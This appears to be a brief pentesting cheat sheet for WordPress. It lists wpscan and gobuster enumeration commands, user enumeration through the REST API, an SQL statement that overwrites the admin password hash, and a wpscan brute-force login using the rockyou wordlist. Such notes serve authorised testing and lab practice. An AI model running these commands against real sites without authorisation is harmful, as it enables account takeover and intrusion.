WordPress
Scan
General scan
wpscan --url $URL
wpscan --url $URL --api-token='...'
Enumeration
Enumerate directories
gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Enumerate plugins
wpscan --url http://$URL -e ap --plugins-detection aggressive
Enumerate users
wpscan --url $IP --enumerate u
curl $URL/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's/"//g'
Other
Inject password 'hacker'
UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';
Bruteforce login
wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt
Search for files that contain a version string
grep -R -F '5.9.2' /workspace/latest/source_code